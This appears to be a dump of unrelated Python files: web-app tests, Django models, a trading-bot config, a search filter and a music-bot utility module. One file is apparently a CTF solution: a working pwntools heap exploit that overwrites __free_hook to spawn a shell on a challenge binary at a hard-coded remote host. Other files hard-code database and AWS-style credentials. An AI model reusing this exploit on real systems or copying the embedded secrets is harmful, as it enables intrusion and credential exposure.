assert "active" not in dash_duo.wait_for_element_by_id(
"page-2-link"
).get_attribute("class")
assert "active" in dash_duo.wait_for_element_by_id(
"page-3-link"
).get_attribute("class")
assert "active" in dash_duo.wait_for_element_by_id(
"page-3-extra-link"
).get_attribute("class")
def test_dbnl_002_manual_active(dash_duo):
"""
Update active status using a callback.
"""
app = Dash()
app.layout = html.Div(
[
# dcc.Location is required to fire events to History
dcc.Location(id="url"),
NavLink("Page 1", id="page-1-link", href="/page-1"),
NavLink("Page 2", id="page-2-link", href="/page-2"),
NavLink("Page 3", id="page-3-link", href="/page-3"),
html.Div(id="content"),
]
)
@app.callback(
[Output("page-{}-link".format(i), "active") for i in range(1, 4)],
Input("url", "pathname"),
)
def set_active(pathname):
return [pathname == "/page-{}".format(i) for i in range(1, 4)]
dash_duo.start_server(app)
assert all(
[
"active"
not in dash_duo.wait_for_element_by_id(
"page-{}-link".format(i)
).get_attribute("class")
for i in range(1, 4)
]
)
dash_duo.wait_for_element_by_id("page-1-link").click()
# wait for callback to update page
WebDriverWait(dash_duo.driver, timeout=10).until(
lambda d: "active"
in d.find_element(By.ID, "page-1-link").get_attribute("class")
)
assert "active" in dash_duo.wait_for_element_by_id(
"page-1-link"
).get_attribute("class")
assert "active" not in dash_duo.wait_for_element_by_id(
"page-2-link"
).get_attribute("class")
assert "active" not in dash_duo.wait_for_element_by_id(
"page-3-link"
).get_attribute("class")
dash_duo.wait_for_element_by_id("page-3-link").click()
# wait for callback to update page
WebDriverWait(dash_duo.driver, timeout=10).until(
lambda d: "active"
not in d.find_element(By.ID, "page-1-link").get_attribute("class")
)
assert "active" not in dash_duo.wait_for_element_by_id(
"page-1-link"
).get_attribute("class")
assert "active" not in dash_duo.wait_for_element_by_id(
"page-2-link"
).get_attribute("class")
assert "active" in dash_duo.wait_for_element_by_id(
"page-3-link"
).get_attribute("class")
|
#!/usr/bin/env python3
"""
main
====
Entrypoint into Garden.
Aggregates loaded modules and provides an aggregated CLI.
"""
import argparse
from collections import defaultdict
from pkginfo import Installed
from pkg_resources import iter_entry_points
from garden.log import logger
ENTRYPOINT = 'garden'
EP_TOOLS = '{}.tools'.format(ENTRYPOINT)
EP_FUNCS = (
'bump',
)
def main():
logger.info('Running Garden')
tools = load_tools()
repos = load_repos()
print(repos)
parser = parse_cli(tools, repos)
args = parser.parse_args()
try:
args.func(args)
except AttributeError:
parser.print_usage()
def load_tools():
"""Load Garden interfaces/libraries."""
tools = {}
logger.debug('Loading interfaces')
for ep in iter_entry_points(EP_TOOLS):
logger.debug('\t%s', ep)
tools[ep.name] = ep.load()
return tools
def load_repos():
"""Load plugins registered under the Garden entrypoint."""
registry = {}
for func in EP_FUNCS:
ep_group = '.'.join((ENTRYPOINT, func))
logger.debug('Loading entrypoints for %s', ep_group)
for ep in iter_entry_points(ep_group):
logger.debug('Loaded entrypoint: %s', ep)
registry[func] = {ep.name: ep}
return registry
def parse_cli(tools, repos):
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers()
for tool_name, fn in tools.items():
# Create sub-command for tool
tool_parser = subparsers.add_parser(tool_name)
### Delegate:
# Have that tool's module set CLI arguments & default action
fn.setup_parser(tool_parser, repos)
return parser
if __name__ == '__main__':
main()
|
#encoding=utf-8
import xlrd
import pymysql
from xlutils.copy import copy
import os
def out():
conn=pymysql.connect(host='localhost',user='root',passwd='12345678',db='wk')
cursor=conn.cursor()
count = cursor.execute('select Studentname from eng;')
print('has %s record' % count )
#重置游标位置
cursor.scroll(0,mode='absolute')
#搜取所有结果
results = cursor.fetchall()
# print(results)
#获取MYSQL里的数据字段
fields = cursor.description
print(fields)
wbk = xlrd.open_workbook('./dates.xls')
wb =copy(wbk)
ws = wb.get_sheet(0)
# sheet = ws.add_sheet('ENG',cell_overwrite_ok=True)
jcs=2
for jcs in range(2,len(results)+2):
ws.write(0,jcs,results[jcs-2][0])
wb.save('../dates.xls')
os.remove('./dates.xlsx')
os.remove('./dates.xls')
|
f = float(input('Qual é o salário do Funcionário? R$'))
novo = f + (f * 15 / 100)
print(f'Um funcionário que ganhava R${f:.2f} com 15% de aumento passa a receber R${novo:.2f}')
|
from pwn import *
import time
import sys
def mode(is_brief):
if is_brief:
proc.recvuntil(':')
proc.sendline('1')
else:
proc.recvuntil(':')
proc.sendline('2')
def create(buf, brief=True):
mode(brief)
proc.recvuntil(':')
proc.sendline('1')
proc.recvuntil(':')
proc.sendline('3')
proc.recvuntil(':')
proc.send(buf)
def edit(idx, buf, brief=True):
mode(brief)
proc.recvuntil(':')
proc.sendline('2')
proc.recvuntil(':')
proc.sendline(str(idx))
proc.recvuntil(':')
proc.send(buf)
def delete(idx, brief=True):
mode(brief)
proc.recvuntil(':')
proc.sendline('3')
proc.recvuntil(':')
proc.sendline(str(idx))
def show():
proc.recvuntil(':')
proc.sendline('3')
def write(addr, value):
edit(3, p64(addr))
edit(0, p64(value))
def exploit():
if len(sys.argv) <= 1:
input('attach to pid: {}'.format(proc.proc.pid))
create(p64(0xdeadbeef)) # 0 2d0
for i in range(7): # fill tcache
delete(0)
show()
proc.recvuntil(':')
heapbase = u64(proc.recvuntil(':')[:6] + b'\x00\x00')
heapbase &= ~0xfff
print(hex(heapbase))
if (heapbase >> 40) == 0x55:
return False
create(b'\x00') # 1 320
delete(0)
edit(0, p64(heapbase + 0x285 - 0x8 + 8))
create(b'\x00', False) # 0_ 2d0
create(b'\x00', False) # 1_ 285-8
edit(1, p64(0x51), False)
#edit(1, p64((((heapbase + 0x280) << 24) & 0xffffffffffffffff) + 0x51), False)
delete(0)
edit(0, p64(heapbase + 0x285 + 8))
create(b'\x00', False) # 2_
create(b'\x00', False) # 3_ 285
delete(1)
edit(1, p64(heapbase + 0x285 - 0x8 + 8))
create(b'\x00', False) # 0_ 2d0
create(b'\x00', False) # 4_ 285-8
edit(4, p64(((heapbase + 0x280) << 24) & 0xffffffffffffffff), False)
edit(3, p64(0x56), False)
write(heapbase + 0x2a0, 0)
write(heapbase + 0x270, 0x100)
write(heapbase + 0x2b0, 0) #0_
write(heapbase + 0x2b8, 0) #1_
write(heapbase + 0x2c0, 0)
write(heapbase + 0x2c8, 0)
write(heapbase + 0x2d0, 0)
create(b'\x00', False)
create(b'\x00', False)
for i in range(8):
delete(0, False)
write(heapbase + 0x2b8, 0) #1_
show()
proc.recvuntil(':')
proc.recvuntil(':')
libc_base = u64(proc.recvuntil('=')[:6] + b'\x00\x00')
libc_base -= 0x3ebca0
print(hex(libc_base))
#malloc_hook = libc_base + 0x3ebc30
free_hook = libc_base + 0x3ed8e8
magic = libc_base + 0x4f322
#write(malloc_hook, magic)
write(free_hook, magic)
delete(0, False) # Get shell!!!
return True
if __name__ == '__main__':
context.arch = 'amd64'
connect = 'nc 210.65.89.169 8888'
connect = connect.split(' ')
while True:
if len(sys.argv) > 1:
proc = remote(connect[1], int(connect[2]))
else:
proc = process(['./FaDaChai'], env={'LD_LIBRARY_PATH': './'})
#proc = process(['./FaDaChai'])
if exploit():
proc.interactive()
break
|
from setuptools import setup
setup(name='studiouhr',
version='0.2',
description='A pyglet based fullscreen studio clock',
url='https://github.com/atoav/studiouhr',
author='David Huss',
author_email='dh@atoav.com',
license='MIT',
packages=['studiouhr'],
install_requires=['pyglet'],
package_data = {'':['fonts/*.ttf']},
entry_points={'console_scripts':['studiouhr=studiouhr.studiouhr:main']},
zip_safe=False
)
|
# -*- coding: utf-8 -*-
from django.db import models
from datetime import datetime
from django.utils import timezone
# Create your models here.
class Course(models.Model):
DEGREE_CHOICES = (
('cj','初级'),
('zj','中级'),
('gj','高级')
)
name = models.CharField(max_length=50,verbose_name='课程名')
desc = models.CharField(max_length=300,verbose_name='课程描述')
#textfield可不输入长度,可无限大
detail = models.TextField(verbose_name='课程详情')
degree = models.CharField(choices=DEGREE_CHOICES,max_length=2)
#使用分钟
learn_times = models.IntegerField(default=0,verbose_name='学习时长(分钟数)')
#学习人数
students = models.IntegerField(default=0,verbose_name='学习人数')
fav_nums = models.IntegerField(default=0,verbose_name='收藏人数')
image = models.ImageField(
upload_to='courses/%Y/%m',
verbose_name='封面图',
max_length=100
)
click_nums = models.IntegerField(default=0,verbose_name='点击数')
add_time = models.DateTimeField(default=timezone.now,verbose_name='添加时间')
def __str__(self):
return self.name
class Meta:
verbose_name = '课程'
verbose_name_plural = verbose_name
class Lesson(models.Model):
course = models.ForeignKey(Course,on_delete=models.CASCADE,verbose_name='课程')
name = models.CharField(max_length=100,verbose_name='章节名')
add_time = models.DateTimeField(default=timezone.now,verbose_name='添加时间')
class Meta:
verbose_name = '章节'
verbose_name_plural = verbose_name
class Video(models.Model):
lesson = models.ForeignKey(Lesson,on_delete=models.CASCADE,verbose_name='章节')
name = models.CharField(max_length=100,verbose_name='视频名')
add_time = models.DateTimeField(default=timezone.now,verbose_name='添加时间')
class Meta():
verbose_name = '视频'
verbose_name_plural = verbose_name
class CourseResource(models.Model):
course = models.ForeignKey(Course,on_delete=models.CASCADE,verbose_name='课程')
name = models.CharField(max_length=100,verbose_name='名称')
download = models.FileField(
upload_to='course/resource/%Y/%m',
verbose_name='资源文件',
max_length=100
)
add_time = models.DateTimeField(default=timezone.now,verbose_name='添加时间')
class Meta:
verbose_name = '课程资源'
verbose_name_plural = verbose_name
|
from django.contrib.staticfiles.testing import StaticLiveServerTestCase
from django.contrib.auth import get_user_model
from common.models import Injection, CRI, Prescription
from treatment_sheets.models import TxSheet, TxItem
from selenium import webdriver
import sys
User = get_user_model()
DEFAULT_WAIT = 10
class FunctionalTest(StaticLiveServerTestCase):
@classmethod
def setUpClass(cls):
for arg in sys.argv:
if 'liveserver' in arg:
cls.server_host = arg.split('=')[1]
cls.server_url = 'http://' + cls.server_host
cls.against_staging = True
return
super().setUpClass()
cls.against_staging = False
cls.server_url = cls.live_server_url
@classmethod
def tearDownClass(cls):
if not cls.against_staging:
super().tearDownClass()
def setUp(self):
self.owner = User.objects.create_user('Marfalo', 'marfalo@gmail.com', 'terriblepw')
Injection.objects.create(name='Tramadol', factor=1/50, concentration='5 mg/mL',
category='Narcotic', admin='PO BID',
desc='It can treat moderate to severe pain.')
CRI.objects.create(name='Morphine', rates=[0.05, 0.005, 0.1, 0.001], factor=1/15, units="mg", calc_type='ez')
CRI.objects.create(name='Dobutamine', factor=1/12500, calc_type='adv')
self.scrip1 = Prescription.objects.create(name='Tylenol', desc='Miracle drug that cures everything.')
self.scrip2 = Prescription.objects.create(name='Robitussin', desc='DMX')
profile = webdriver.FirefoxProfile()
profile.set_preference("browser.startup.homepage", "about:blank")
profile.set_preference("startup.homepage_welcome_url", "about:blank")
profile.set_preference("startup.homepage_welcome_url.additional", "about:blank")
self.browser = webdriver.Firefox(firefox_profile=profile)
self.browser.implicitly_wait(DEFAULT_WAIT)
def tearDown(self):
self.browser.quit()
super().tearDown()
def get_item_input_box(self):
return self.browser.find_element_by_id('id_weight')
def create_list(self):
tx_sheet = TxSheet.objects.create(owner=self.owner, name='DD', comment='i heart diamond dogs')
item1 = TxItem.objects.create(sheet=tx_sheet, med=self.scrip1)
tx_sheet.txitem_set.add(item1)
|
import os
import sys
import unittest
import pytorch_lightning as pl
import pytorch_lightning.loggers
from deep_depth_transfer import ResultVisualizer
from deep_depth_transfer import UnsupervisedDepthModel, PoseNetResNet, DepthNetResNet, UnsupervisedCriterion
from deep_depth_transfer.data import KittiDataModuleFactory
from test.data_module_mock import DataModuleMock
from deep_depth_transfer.utils import LoggerCollection, TensorBoardLogger, MLFlowLogger
from pytorch_lightning.utilities import AttributeDict
if sys.platform == "win32":
WORKERS_COUNT = 0
else:
WORKERS_COUNT = 4
class TestResultVisualizer(unittest.TestCase):
def setUp(self) -> None:
current_folder = os.path.dirname(os.path.abspath(__file__))
dataset_folder = os.path.join(os.path.dirname(current_folder), "datasets", "kitti")
data_module_factory = KittiDataModuleFactory(range(0, 301, 1), directory=dataset_folder)
self._data_module = data_module_factory.make_dataset_manager(
final_image_size=(128, 384),
transform_manager_parameters={"filters": True},
batch_size=1,
num_workers=WORKERS_COUNT,
split=(0.8, 0.1, 0.1)
)
self._data_module = DataModuleMock(self._data_module)
pose_net = PoseNetResNet()
depth_net = DepthNetResNet()
criterion = UnsupervisedCriterion(self._data_module.get_cameras_calibration(), 1, 1)
result_visualizer = ResultVisualizer(cameras_calibration=self._data_module.get_cameras_calibration())
params = AttributeDict(lr=1e-3, beta1=0.99, beta2=0.9)
self._model = UnsupervisedDepthModel(params, pose_net, depth_net, criterion,
result_visualizer=result_visualizer).cuda()
self._tb_logger = TensorBoardLogger('logs/')
self._second_tb_logger = TensorBoardLogger('logs1/')
self._double_tb_logger = LoggerCollection([self._tb_logger, self._second_tb_logger])
os.environ["MLFLOW_S3_ENDPOINT_URL"] = "http://ec2-3-134-104-174.us-east-2.compute.amazonaws.com:9000"
os.environ["AWS_ACCESS_KEY_ID"] = "depth"
os.environ["AWS_SECRET_ACCESS_KEY"] = "depth123"
self._mlflow_logger = MLFlowLogger(experiment_name="test",
tracking_uri="http://ec2-3-134-104-174.us-east-2.compute.amazonaws.com:5001")
def test_tb_logger(self):
trainer = pl.Trainer(logger=self._tb_logger, max_epochs=1, gpus=1, progress_bar_refresh_rate=20)
trainer.fit(self._model, self._data_module)
def test_double_tb_logger(self):
trainer = pl.Trainer(logger=self._double_tb_logger,
max_epochs=1, gpus=1, progress_bar_refresh_rate=20)
trainer.fit(self._model, self._data_module)
def test_mlflow_logger(self):
trainer = pl.Trainer(logger=self._mlflow_logger,
max_epochs=1, gpus=1, progress_bar_refresh_rate=20)
trainer.fit(self._model, self._data_module) |
from django.contrib import admin
# Register your models here.
from django.contrib import admin
from .models import Altbauwohnungen
admin.site.register(Altbauwohnungen)
|
import key
symbolnumber = 1
symbolname=["BNBUSDT" , "ADAUSDT" , "WAVESUSDT", "XRPUSDT", "NEOUSDT" , "EOSUSDT" , "DOTUSDT" , "LINKUSDT" , "DOGEUSDT","1INCHUSDT" , "BCHUSDT" , "XLMUSDT" , "ETCUSDT" , "SXPUSDT" , 'LTCUSDT']
symbollimit = [2 , 0 , 1 , 1 , 2 , 1 , 1 , 2 , 0 , 0 , 3 , 0 , 2 , 1 , 3]
simbollimitstring = ["%.2f" , "%.0f" , "%.1f" , "%.1f" , "%.2f" , "%.1f" , "%.1f" , "%.2f" , "%.0f" , "%.0f" , "%.3f" , "%.0f" , "%.2f" , "%.1f" , "%.3f"]
symbolpricelimit = ['%.2f',"%1.5f","%2.3f","%1.4f","%1.3f", "%.3f" , "%.3f" , "%.3f" , "%.6f" , "%.4f" , "%.2f", "%.5f","%.3f" , "%.4f" , "%.2f"]
ema52 = 0
ema24 = 1
signal18 = 2
macd =3
ramp = 4
lastramp = 5
price = 6
smallma = 7
smallmaindex = 8
bigma = 9
bigmaindex = 10
smallmadata = 11
bigmadata = 12
hostogramhistory = 13
pricedata = 14
priceindex = 15
rsi = 16
smallmacount = 5
bigmacount = 20
bigema52 = 0
bigema24 = 1
bigsignal18 =2
bighistogram = 3
biglasthistogram = 4
bigtwolasthistogram = 5
bigmacddata = 6
bigsignaldata = 7
bigmacdramp = 8
bigsignalramp = 9
position = 0
sleep = 1
openprice = 2
highlimit = 3
lowlimit = 4
lasttraderesult = 5
intrade =6
closeprice = 7
fund = 8
quantity = 9
sell = 0
buy = 1
highlimitpercent = 0.01
lowlimitpercent = 0.015
leverage = 1
interval = '5m'
intervalbig = "30m"
intervalsmall = '1m'
api_key = key.api_key
secret_key = key.secret_key
smallsmallmacount = 5
smallbigmacount = 23
rsinumber = 7
smallsmallmadata = 0
smallbigmadata = 1
smallbigmaindex = 2
smallsmallmaindex = 3
smallsmallma = 4
smallbigma = 5
smallsmallmaramp = 6
smallbigmaramp = 7
|
from rest_framework.settings import api_settings
from rest_framework.response import Response
from rest_framework.filters import BaseFilterBackend
from elasticsearch_dsl.query import MultiMatch, Q
from django.db.models import Case, When
from stretch.utils import import_class
import logging
logger = logging.getLogger('stretch')
class StretchSearchFilter(BaseFilterBackend):
search_param = api_settings.SEARCH_PARAM
def _cast_pk(self, pk):
try:
pk = int(pk)
except ValueError:
pass
return pk
def get_search_result_ids(self, search_results):
result_ids = []
for result in search_results:
pk = self._cast_pk(result.meta.id)
result_ids.append(pk)
return result_ids
def set_ordering(self, request, queryset, result_ids):
"""
Preserve the custom ordering from search, unless overwritten
"""
ordering_param = api_settings.ORDERING_PARAM
ordering = request.query_params.get(ordering_param)
if not ordering:
## Preserve the search ordering
## NOTE: This adds a performance penalty of 100/200ms.
preserved = Case(*[When(pk=pk, then=pos) for pos, pk in enumerate(result_ids)])
queryset = queryset.order_by(preserved)
return queryset
def add_default_filters(self, s, view, index, request, queryset):
"""
Set the top level filters for the search
"""
# We MUST filter Elastisearch query by the default queryset items, or we will get incomplete
# results due to pagination.
pk_values = list(set(queryset.values_list('pk', flat=True)))
s = s.filter(Q('ids', values=pk_values))
return s
def add_default_search(self, s, view, index, request, queryset):
"""
Add a default search that uses multi-match against all the default index fields
"""
query = request.query_params.get(self.search_param, '')
# First component of default search filters on fuzzy matches of all fields.
fuzzy_multi_kwargs = {
'fields': index._meta.default_search_fields,
'type': 'best_fields',
'query': query,
'fuzziness': 'AUTO',
'analyzer': 'standard'
}
s = s.query('bool', filter=[Q('multi_match', **fuzzy_multi_kwargs)])
# Second component of default search is a phrase based MultiMatch
# We use `should` here so that we still show 0 score results from fuzzy match
phrase_multi_kwargs = {
'fields': index._meta.default_search_fields,
'type': 'phrase',
'query': query,
'analyzer': 'standard'
}
s = s.query('bool', should=[Q('multi_match', **phrase_multi_kwargs)])
return s
def add_pagination(self, s, view, index, request, queryset):
# We must grab all results from elasticsearch, otherwise the pagination in
# DRF will not work correctly. This may have performance implications and is worth
# revisiting later. Currently our best bet is to grab the max result window of the index.
# The default max result window is 10000, so more than that requires multiple requests
pager_size = index._get_settings().get('max_result_window', 10000)
s = s[0:pager_size]
return s
def add_extras_and_params(self, s, view, index, request, queryset):
# Guarantee complete scoring, rather than best guess scoring
s = s.params(search_type='dfs_query_then_fetch')
# Only grab meta since we are just interested in
# primary keys. This speeds things up a bit.
s = s.extra(_source=False)
return s
def build_search(self, view, index, request, queryset):
"""
Prepare the Elasticsearch DSL Search instance
"""
s = index.dsl.search() # Create a new Search instance
s = self.add_default_filters(s, view, index, request, queryset)
s = self.add_default_search(s, view, index, request, queryset)
s = self.add_pagination(s, view, index, request, queryset)
s = self.add_extras_and_params(s, view, index, request, queryset)
# Additional hook for any last changes right from the view
if hasattr(view, 'stretch_modify_search'):
s = view.stretch_modify_search(s, view, index, request, queryset)
return s
def _get_index(self, view):
index = getattr(view, 'stretch_index')
if isinstance(index, str):
index = import_class(index)
index = index()
return index
def _remove_default_ordering(self, view):
"""
Prevent DRF Order Filter can override search ordering
If the OrderingFilter is placed after the StretchSearchFilter
and a default `ordering` is set, it will override the search ordering.
This workaround will remove the default ordering from the view object
when a request has a search being performed.
"""
if hasattr(view, 'ordering'):
setattr(view, 'ordering', None)
def filter_queryset(self, request, queryset, view):
"""
DRF Filter API Method
"""
## Pass through original queryset if the search filter isn't being used
query = request.query_params.get(self.search_param, '')
if not query:
return queryset
self._remove_default_ordering(view)
index = self._get_index(view)
s = self.build_search(view, index, request, queryset)
search_results = s.execute()
## Filter and order queryset by search results
result_ids = self.get_search_result_ids(search_results)
queryset = queryset.filter(pk__in=result_ids)
queryset = self.set_ordering(request, queryset, result_ids)
return queryset
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
from werkzeug.serving import run_simple
from werkzeug.debug import DebuggedApplication
from werkzeug.wsgi import SharedDataMiddleware
from word_finder.wsgi import application
from word_finder.settings import DEBUG, SERVE_STATIC
if SERVE_STATIC:
application = SharedDataMiddleware(application, {'/static': os.path.join(
os.path.dirname(__file__), 'word_finder', 'static')})
if DEBUG:
application = DebuggedApplication(application, evalex=True)
run_simple('localhost', 8000, application, use_reloader=True)
|
import threading,time
import queue,random
q = queue.Queue(maxsize=10)
#
# def producer(name):
# count = 0
# remain = 0
# while True:
# if event.is_set():
# print("开始做饭")
#
# for i in range(10 - q.qsize()):
# q.put("骨头%s"%count)
# count = count + 1
# if i == int(10 - random.random()*10):
# break
# print("remain:%s"%q.qsize())
# event.clear()
# else:
# event.wait()
#
# def cusumer(name):
# num = 0
# while True:
# while q.qsize() > 0:
# num = num + 1
#
# print("%s 取到 %s 吃掉它,总共吃了%s"%(name,q.get(),num))
#
# event.clear()
# time.sleep(0.2)
# else:
# event.set()
#
#
# event = threading.Event()
#
#
# p = threading.Thread(target=producer,args=('Alex',))
#
# c = threading.Thread(target=cusumer,args=('a',))
# c1 = threading.Thread(target=cusumer,args=('b',))
# c2 = threading.Thread(target=cusumer,args=('c',))
#
# q.put("")
#
# p.start()
# c.start()
# c1.start()
# c2.start()
#
#
def product(name):
count = 1
while True:
q.put("gutou%s"%count)
# print("CountNum%s"%count)
count +=1
time.sleep(0.11)
def consume(name):
while True:
if q.qsize() > 0:
print("%s eat %s"%(name,q.get()))
t = threading.Thread(target=product,args=('alex',))
c2 = threading.Thread(target=consume,args=('a',))
c1 = threading.Thread(target=consume, args=('b',))
c3 = threading.Thread(target=consume, args=('c',))
t.start()
c1.start()
c2.start()
c3.start()
|
#!/usr/bin/python3
# coding=utf-8
import hashlib
import magic
import os
import sys
import variables as var
import constants
import zipfile
import requests
import mutagen
import re
import subprocess as sp
import logging
import youtube_dl
from importlib import reload
from PIL import Image
from io import BytesIO
from sys import platform
import traceback
import urllib.parse, urllib.request, urllib.error
import base64
import media
import media.radio
from packaging import version
log = logging.getLogger("bot")
def solve_filepath(path):
if not path:
return ''
if path[0] == '/':
return path
else:
mydir = os.path.dirname(os.path.realpath(__file__))
return mydir + '/' + path
def get_recursive_file_list_sorted(path):
filelist = []
for root, dirs, files in os.walk(path):
relroot = root.replace(path, '', 1)
if relroot != '' and relroot in var.config.get('bot', 'ignored_folders'):
continue
if len(relroot):
relroot += '/'
for file in files:
if file in var.config.get('bot', 'ignored_files'):
continue
fullpath = os.path.join(path, relroot, file)
if not os.access(fullpath, os.R_OK):
continue
mime = magic.from_file(fullpath, mime=True)
if 'audio' in mime or 'audio' in magic.from_file(fullpath).lower() or 'video' in mime:
filelist.append(relroot + file)
filelist.sort()
return filelist
def get_music_path(music):
uri = ''
if music["type"] == "url":
uri = music['path']
elif music["type"] == "file":
uri = var.music_folder + music["path"]
elif music["type"] == "radio":
uri = music['url']
return uri
def attach_item_id(item):
if item['type'] == 'url':
item['id'] = hashlib.md5(item['url'].encode()).hexdigest()
elif item['type'] == 'file':
item['id'] = hashlib.md5(item['path'].encode()).hexdigest()
elif item['type'] == 'radio':
item['id'] = hashlib.md5(item['url'].encode()).hexdigest()
return item
def attach_music_tag_info(music):
music = attach_item_id(music)
if "path" in music:
uri = get_music_path(music)
if os.path.isfile(uri):
match = re.search("(.+)\.(.+)", uri)
if match is None:
return music
file_no_ext = match[1]
ext = match[2]
try:
im = None
path_thumbnail = file_no_ext + ".jpg"
if os.path.isfile(path_thumbnail):
im = Image.open(path_thumbnail)
if ext == "mp3":
# title: TIT2
# artist: TPE1, TPE2
# album: TALB
# cover artwork: APIC:
tags = mutagen.File(uri)
if 'TIT2' in tags:
music['title'] = tags['TIT2'].text[0]
if 'TPE1' in tags: # artist
music['artist'] = tags['TPE1'].text[0]
if im is None:
if "APIC:" in tags:
im = Image.open(BytesIO(tags["APIC:"].data))
elif ext == "m4a" or ext == "m4b" or ext == "mp4" or ext == "m4p":
# title: ©nam (\xa9nam)
# artist: ©ART
# album: ©alb
# cover artwork: covr
tags = mutagen.File(uri)
if '©nam' in tags:
music['title'] = tags['©nam'][0]
if '©ART' in tags: # artist
music['artist'] = tags['©ART'][0]
if im is None:
if "covr" in tags:
im = Image.open(BytesIO(tags["covr"][0]))
if im:
im.thumbnail((100, 100), Image.ANTIALIAS)
buffer = BytesIO()
im = im.convert('RGB')
im.save(buffer, format="JPEG")
music['thumbnail'] = base64.b64encode(buffer.getvalue()).decode('utf-8')
except:
pass
else:
uri = music['url']
# if nothing found
if 'title' not in music:
match = re.search("([^\.]+)\.?.*", os.path.basename(uri))
music['title'] = match[1]
return music
def format_song_string(music):
display = ''
source = music["type"]
title = music["title"] if "title" in music else "Unknown title"
artist = music["artist"] if "artist" in music else "Unknown artist"
if source == "radio":
display = constants.strings("now_playing_radio",
url=music["url"],
title=media.radio.get_radio_title(music["url"]),
name=music["name"],
user=music["user"]
)
elif source == "url" and 'from_playlist' in music:
display = constants.strings("now_playing_from_playlist",
title=title,
url=music['url'],
playlist_url=music["playlist_url"],
playlist=music["playlist_title"],
user=music["user"]
)
elif source == "url":
display = constants.strings("now_playing_url",
title=title,
url=music["url"],
user=music["user"]
)
elif source == "file":
display = constants.strings("now_playing_file",
title=title,
artist=artist,
user=music["user"]
)
return display
def format_debug_song_string(music):
display = ''
source = music["type"]
title = music["title"] if "title" in music else "??"
artist = music["artist"] if "artist" in music else "??"
if source == "radio":
display = "[radio] {name} ({url}) by {user}".format(
name=music["name"],
url=music["url"],
user=music["user"]
)
elif source == "url" and 'from_playlist' in music:
display = "[url] {title} ({url}) from playlist {playlist} by {user}".format(
title=title,
url=music["url"],
playlist=music["playlist_title"],
user=music["user"]
)
elif source == "url":
display = "[url] {title} ({url}) by {user}".format(
title=title,
url=music["url"],
user=music["user"]
)
elif source == "file":
display = "[file] {artist} - {title} ({path}) by {user}".format(
title=title,
artist=artist,
path=music["path"],
user=music["user"]
)
return display
def format_current_playing():
music = var.playlist.current_item()
display = format_song_string(music)
if 'thumbnail' in music:
thumbnail_html = '<img width="80" src="data:image/jpge;base64,' + \
music['thumbnail'] + '"/>'
return display + "<br />" + thumbnail_html
return display
# - zips all files of the given zippath (must be a directory)
# - returns the absolute path of the created zip file
# - zip file will be in the applications tmp folder (according to configuration)
# - format of the filename itself = prefix_hash.zip
# - prefix can be controlled by the caller
# - hash is a sha1 of the string representation of the directories' contents (which are
# zipped)
def zipdir(zippath, zipname_prefix=None):
zipname = var.tmp_folder
if zipname_prefix and '../' not in zipname_prefix:
zipname += zipname_prefix.strip().replace('/', '_') + '_'
files = get_recursive_file_list_sorted(zippath)
hash = hashlib.sha1((str(files).encode())).hexdigest()
zipname += hash + '.zip'
if os.path.exists(zipname):
return zipname
zipf = zipfile.ZipFile(zipname, 'w', zipfile.ZIP_DEFLATED)
for file in files:
file_to_add = os.path.join(zippath, file)
if not os.access(file_to_add, os.R_OK):
continue
if file in var.config.get('bot', 'ignored_files'):
continue
add_file_as = os.path.relpath(os.path.join(zippath, file), os.path.join(zippath, '..'))
zipf.write(file_to_add, add_file_as)
zipf.close()
return zipname
def get_user_ban():
res = "List of ban hash"
for i in var.db.items("user_ban"):
res += "<br/>" + i[0]
return res
def new_release_version():
v = urllib.request.urlopen(urllib.request.Request("https://packages.azlux.fr/botamusique/version")).read()
return v.rstrip().decode()
def update(current_version):
global log
new_version = new_release_version()
target = var.config.get('bot', 'target_version')
if version.parse(new_version) > version.parse(current_version) or target == "testing":
log.info('update: new version, start updating...')
tp = sp.check_output(['/usr/bin/env', 'bash', 'update.sh', target]).decode()
log.debug(tp)
log.info('update: update pip libraries dependencies')
sp.check_output([var.config.get('bot', 'pip3_path'), 'install', '--upgrade', '-r', 'requirements.txt']).decode()
msg = "New version installed, please restart the bot."
if target == "testing":
msg += tp.replace('\n', '<br/>')
else:
log.info('update: starting update youtube-dl via pip3')
tp = sp.check_output([var.config.get('bot', 'pip3_path'), 'install', '--upgrade', 'youtube-dl']).decode()
msg = ""
if "Requirement already up-to-date" in tp:
msg += "Youtube-dl is up-to-date"
else:
msg += "Update done: " + tp.split('Successfully installed')[1]
reload(youtube_dl)
msg += "<br/> Youtube-dl reloaded"
return msg
def user_ban(user):
var.db.set("user_ban", user, None)
res = "User " + user + " banned"
return res
def user_unban(user):
var.db.remove_option("user_ban", user)
res = "Done"
return res
def get_url_ban():
res = "List of ban hash"
for i in var.db.items("url_ban"):
res += "<br/>" + i[0]
return res
def url_ban(url):
var.db.set("url_ban", url, None)
res = "url " + url + " banned"
return res
def url_unban(url):
var.db.remove_option("url_ban", url)
res = "Done"
return res
def pipe_no_wait(pipefd):
''' Used to fetch the STDERR of ffmpeg. pipefd is the file descriptor returned from os.pipe()'''
if platform == "linux" or platform == "linux2" or platform == "darwin":
import fcntl
import os
try:
fl = fcntl.fcntl(pipefd, fcntl.F_GETFL)
fcntl.fcntl(pipefd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
except:
print(sys.exc_info()[1])
return False
else:
return True
elif platform == "win32":
# https://stackoverflow.com/questions/34504970/non-blocking-read-on-os-pipe-on-windows
import msvcrt
import os
from ctypes import windll, byref, wintypes, GetLastError, WinError
from ctypes.wintypes import HANDLE, DWORD, POINTER, BOOL
LPDWORD = POINTER(DWORD)
PIPE_NOWAIT = wintypes.DWORD(0x00000001)
ERROR_NO_DATA = 232
SetNamedPipeHandleState = windll.kernel32.SetNamedPipeHandleState
SetNamedPipeHandleState.argtypes = [HANDLE, LPDWORD, LPDWORD, LPDWORD]
SetNamedPipeHandleState.restype = BOOL
h = msvcrt.get_osfhandle(pipefd)
res = windll.kernel32.SetNamedPipeHandleState(h, byref(PIPE_NOWAIT), None, None)
if res == 0:
print(WinError())
return False
return True
class Dir(object):
def __init__(self, path):
self.name = os.path.basename(path.strip('/'))
self.fullpath = path
self.subdirs = {}
self.files = []
def add_file(self, file):
if file.startswith(self.name + '/'):
file = file.replace(self.name + '/', '', 1)
if '/' in file:
# This file is in a subdir
subdir = file.split('/')[0]
if subdir in self.subdirs:
self.subdirs[subdir].add_file(file)
else:
self.subdirs[subdir] = Dir(os.path.join(self.fullpath, subdir))
self.subdirs[subdir].add_file(file)
